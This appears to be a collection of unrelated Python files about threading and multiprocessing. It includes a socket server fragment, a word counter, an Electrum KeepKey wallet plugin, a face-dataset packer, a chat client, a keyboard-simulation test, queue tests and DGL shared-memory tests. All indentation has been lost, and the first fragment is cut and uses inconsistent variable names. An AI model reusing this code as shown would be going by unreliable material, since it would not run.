def handleClient(socketConnection, address, timeOfConnect):
while 1:
sentence = connectionSocket.recv(1024)
if sentence.decode('utf-8') == 'close':
lock.acquire()
logAccess['START: '+ str(timeOfConnect)]='END: '+ str(datetime.now())
lock.release()
connectionSocket.close()
break
else:
response = analyze(sentence)
connectionSocket.send(response)
try:
while 1:
connectionSocket, addr = serverSocket.accept()
lock.acquire()
logAccess['START: '+ str(datetime.now())] = ''
lock.release()
threading.Thread(target = handleClient,args = (connectionSocket,addr, datetime.now())).start()
except Exception as e:
print(e)
connectionSocket.close()
|
tf-16.py
|
import re, sys, operator, Queue, threading
# Two data spaces
word_space = Queue.Queue()
freq_space = Queue.Queue()
stopwords = set(open('../stop_words.txt').read().split(','))
# Worker function that consumes words from the word space
# and sends partial results to the frequency space
def process_words():
word_freqs = {}
while True:
try:
word = word_space.get(timeout=1)
except Queue.Empty:
break
if not word in stopwords:
if word in word_freqs:
word_freqs[word] += 1
else:
word_freqs[word] = 1
freq_space.put(word_freqs)
# Let's create the workers and launch them at their jobs
workers = []
for i in range(5):
workers.append(threading.Thread(target = process_words))
[t.start() for t in workers]
# Let's have this thread populate the word space
for word in re.findall('[a-z]{2,}', open(sys.argv[1]).read().lower()):
word_space.put(word)
# Let's wait for the workers to finish
[t.join() for t in workers]
# Let's merge the partial frequency results by consuming
# frequency data from the frequency space
word_freqs = {}
while not freq_space.empty():
freqs = freq_space.get()
for (k, v) in freqs.iteritems():
if k in word_freqs:
count = sum(item[k] for item in [freqs, word_freqs])
else:
count = freqs[k]
word_freqs[k] = count
for (w, c) in sorted(word_freqs.iteritems(), key=operator.itemgetter(1), reverse=True)[:25]:
print w, '-', c
|
plugin.py
|
from binascii import hexlify, unhexlify
from electrum.util import bfh, bh2u
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if KeepKey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin Gold"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# python3 face2rec2.py /path to your train.lst --num-thread 8
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
client.py
|
from socket import *
import threading
from tkinter import *
address='127.0.0.1' #服务器的ip地址
port=9000
buffsize=1024
s=socket(AF_INET, SOCK_STREAM)
s.connect((address,port))
def recv():
while True:
recvdata = s.recv(buffsize).decode('utf-8')
gui.listBox.insert(END, recvdata)
print('\n' + recvdata + '\n')
class GUI:
def __init__(self, root):
self.root = root
self.listBox = Listbox(self.root)
self.listBox.pack()
self.entry = Entry(self.root)
self.entry.pack()
self.sendBtn = Button(self.root, text='SEND', command=self.send)
self.sendBtn.pack()
def send(self):
senddata = self.entry.get()
s.send(senddata.encode())
def createGUI():
global gui
root = Tk()
gui = GUI(root)
root.title('Client Text')
root.mainloop()
if __name__ == '__main__':
t1 = threading.Thread(target=recv, args=(), name='recv')
t2 = threading.Thread(target=createGUI, args=(), name='gui')
t1.start()
t2.start()
|
manual_control_test.py
|
import random
import threading
import time
def inp_handler(name):
from pynput.keyboard import Controller as KeyboardController
from pynput.keyboard import Key
keyboard = KeyboardController()
time.sleep(0.1)
choices = ["w", "a", "s", "d", "j", "k", Key.left, Key.right, Key.up, Key.down]
NUM_TESTS = 50
for x in range(NUM_TESTS):
i = random.choice(choices) if x != NUM_TESTS - 1 else Key.esc
keyboard.press(i)
time.sleep(0.1)
keyboard.release(i)
def manual_control_test(manual_control):
manual_in_thread = threading.Thread(target=inp_handler, args=(1,))
manual_in_thread.start()
try:
manual_control()
except Exception:
raise Exception("manual_control() has crashed. Please fix it.")
manual_in_thread.join()
|
test_faster_fifo.py
|
import logging
import multiprocessing
from queue import Full, Empty
from unittest import TestCase
from faster_fifo import Queue
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log = logging.getLogger('rl')
log.setLevel(logging.DEBUG)
log.handlers = [] # No duplicated handlers
log.propagate = False # workaround for duplicated logs in ipython
log.addHandler(ch)
MSG_SIZE = 5
# I think we don't need this anymore (check!)
# if sys.version_info >= (3, 8) and sys.platform == 'darwin':
# multiprocessing.set_start_method('fork')
def make_msg(msg_idx):
return (msg_idx,) * MSG_SIZE
def produce(q, p_idx, num_messages):
i = 0
while i < num_messages:
try:
q.put(make_msg(i), timeout=0.01)
if i % 50000 == 0:
log.info('Produce: %d %d', i, p_idx)
i += 1
except Full:
# time.sleep(0.001)
pass
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
def consume(q, p_idx, consume_many, total_num_messages=int(1e9)):
messages_received = 0
while True:
try:
msgs = q.get_many(timeout=0.01, max_messages_to_get=consume_many)
for msg in msgs:
messages_received += 1
if msg[0] % 50000 == 0:
log.info('Consume: %r %d num_msgs: %d', msg, p_idx, len(msgs))
if messages_received >= total_num_messages:
break
except Empty:
if q.is_closed():
break
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
class TestFastQueue(TestCase):
def test_singleproc(self):
q = Queue()
produce(q, 0, num_messages=20)
consume(q, 0, consume_many=2, total_num_messages=20)
q.close()
def test_multiproc(self):
q = Queue()
consume_many = 1000
producers = []
consumers = []
for j in range(20):
p = multiprocessing.Process(target=produce, args=(q, j, 1000001))
producers.append(p)
for j in range(3):
p = multiprocessing.Process(target=consume, args=(q, j, consume_many))
consumers.append(p)
for c in consumers:
c.start()
for p in producers:
p.start()
for p in producers:
p.join()
q.close()
for c in consumers:
c.join()
log.info('Exit...')
def test_msg(self):
q = Queue(max_size_bytes=1000)
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
res = q.get_nowait()
log.debug('Got object %r', res)
self.assertEqual(py_obj, res)
def test_queue_size(self):
q = Queue(max_size_bytes=1000)
py_obj_1 = dict(a=10, b=20)
py_obj_2 = dict(a=30, b=40)
q.put_nowait(py_obj_1)
q.put_nowait(py_obj_2)
q_size_bef = q.qsize()
log.debug('Queue size after put - %d', q_size_bef)
num_messages = 0
want_to_read = 2
while num_messages < want_to_read:
msgs = q.get_many()
print(msgs)
num_messages += len(msgs)
self.assertEqual(type(q_size_bef), int)
q_size_af = q.qsize()
log.debug('Queue size after get - %d', q_size_af)
self.assertEqual(q_size_af, 0)
def test_queue_empty(self):
q = Queue(max_size_bytes=1000)
self.assertTrue(q.empty())
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
q_empty = q.empty()
self.assertFalse(q_empty)
def test_queue_full(self):
q = Queue(max_size_bytes=60)
self.assertFalse(q.full())
py_obj = (1, 2)
while True:
try:
q.put_nowait(py_obj)
except Full:
self.assertTrue(q.full())
break
def test_queue_usage(self):
q = Queue(1000 * 1000) # specify the size of the circular buffer in the ctor
# any pickle-able Python object can be added to the queue
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put(py_obj)
assert q.qsize() == 1
retrieved = q.get()
assert q.empty()
assert py_obj == retrieved
for i in range(100):
try:
q.put(py_obj, timeout=0.1)
except Full:
log.debug('Queue is full!')
num_received = 0
while num_received < 100:
# get multiple messages at once, returns a list of messages for better performance in many-to-few scenarios
# get_many does not guarantee that all max_messages_to_get will be received on the first call, in fact
# no such guarantee can be made in multiprocessing systems.
# get_many() will retrieve as many messages as there are available AND can fit in the pre-allocated memory
# buffer. The size of the buffer is increased gradually to match demand.
messages = q.get_many(max_messages_to_get=100)
num_received += len(messages)
try:
q.get(timeout=0.1)
assert True, 'This won\'t be called'
except Empty:
log.debug('Queue is empty')
def spawn_producer(data_q_):
for i in range(10):
data = [1, 2, 3, i]
data_q_.put(data)
def spawn_consumer(data_q_):
i = 0
while True:
try:
data = data_q_.get(timeout=0.5)
print(data)
i += 1
except Empty:
print('Read', i, 'messages')
break
class TestSpawn(TestCase):
def test_spawn_ctx(self):
ctx = multiprocessing.get_context('spawn')
data_q = Queue(1000 * 1000)
procs = [
ctx.Process(target=spawn_producer, args=(data_q,)) for _ in range(2)
]
procs.append(ctx.Process(target=spawn_consumer, args=(data_q,)))
for p in procs:
p.start()
for p in procs:
p.join()
|
action.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 kirmani <sean@kirmani.io>
#
# Distributed under terms of the MIT license.
"""
Action.
"""
from multiprocessing import Process
import os
import signal
class Action:
def __init__(self, name, entities, preconditions, postconditions):
self.name = name
self.entities = entities
self.preconditions = preconditions
self.postconditions = postconditions
self.process_ = Process(target = self.TaskWrapper_)
self.on_interrupt_ = None
def Task(self):
pass
def Start(self):
self.process_.start()
def Interrupt(self):
os.killpg(os.getpgid(self.process_.pid), signal.SIGTERM)
if (self.on_interrupt_):
self.on_interrupt_(self)
def OnInterrupt(self, func):
self.on_interrupt_ = func
def IsFinished(self):
return not self.process_.is_alive()
def TaskWrapper_(self):
os.setpgid(os.getpid(), os.getpid())
self.Task()
|
test_shared_mem_store.py
|
import dgl
import sys
import random
import time
import numpy as np
from multiprocessing import Process
from scipy import sparse as spsp
import mxnet as mx
import backend as F
import unittest
import dgl.function as fn
num_nodes = 100
num_edges = int(num_nodes * num_nodes * 0.1)
rand_port = random.randint(5000, 8000)
print('run graph store with port ' + str(rand_port), file=sys.stderr)
def check_array_shared_memory(g, worker_id, arrays):
if worker_id == 0:
for i, arr in enumerate(arrays):
arr[0] = i
g._sync_barrier()
else:
g._sync_barrier()
for i, arr in enumerate(arrays):
assert np.all(arr[0].asnumpy() == i)
def check_init_func(worker_id, graph_name):
time.sleep(3)
print("worker starts")
np.random.seed(0)
csr = (spsp.random(num_nodes, num_nodes, density=0.1, format='csr') != 0).astype(np.int64)
g = dgl.contrib.graph_store.create_graph_from_store(graph_name, "shared_mem", port=rand_port)
# Verify the graph structure loaded from the shared memory.
src, dst = g.all_edges()
coo = csr.tocoo()
assert F.array_equal(dst, F.tensor(coo.row))
assert F.array_equal(src, F.tensor(coo.col))
assert F.array_equal(g.nodes[0].data['feat'], F.tensor(np.arange(10), dtype=np.float32))
assert F.array_equal(g.edges[0].data['feat'], F.tensor(np.arange(10), dtype=np.float32))
g.init_ndata('test4', (g.number_of_nodes(), 10), 'float32')
g.init_edata('test4', (g.number_of_edges(), 10), 'float32')
g._sync_barrier()
check_array_shared_memory(g, worker_id, [g.nodes[:].data['test4'], g.edges[:].data['test4']])
data = g.nodes[:].data['test4']
g.set_n_repr({'test4': mx.nd.ones((1, 10)) * 10}, u=[0])
assert np.all(data[0].asnumpy() == g.nodes[0].data['test4'].asnumpy())
data = g.edges[:].data['test4']
g.set_e_repr({'test4': mx.nd.ones((1, 10)) * 20}, edges=[0])
assert np.all(data[0].asnumpy() == g.edges[0].data['test4'].asnumpy())
g.destroy()
def server_func(num_workers, graph_name):
print("server starts")
np.random.seed(0)
csr = (spsp.random(num_nodes, num_nodes, density=0.1, format='csr') != 0).astype(np.int64)
g = dgl.contrib.graph_store.create_graph_store_server(csr, graph_name, "shared_mem", num_workers,
False, edge_dir="in", port=rand_port)
assert num_nodes == g._graph.number_of_nodes()
assert num_edges == g._graph.number_of_edges()
g.ndata['feat'] = mx.nd.arange(num_nodes * 10).reshape((num_nodes, 10))
g.edata['feat'] = mx.nd.arange(num_edges * 10).reshape((num_edges, 10))
g.run()
def test_init():
serv_p = Process(target=server_func, args=(2, 'test_graph1'))
work_p1 = Process(target=check_init_func, args=(0, 'test_graph1'))
work_p2 = Process(target=check_init_func, args=(1, 'test_graph1'))
serv_p.start()
work_p1.start()
work_p2.start()
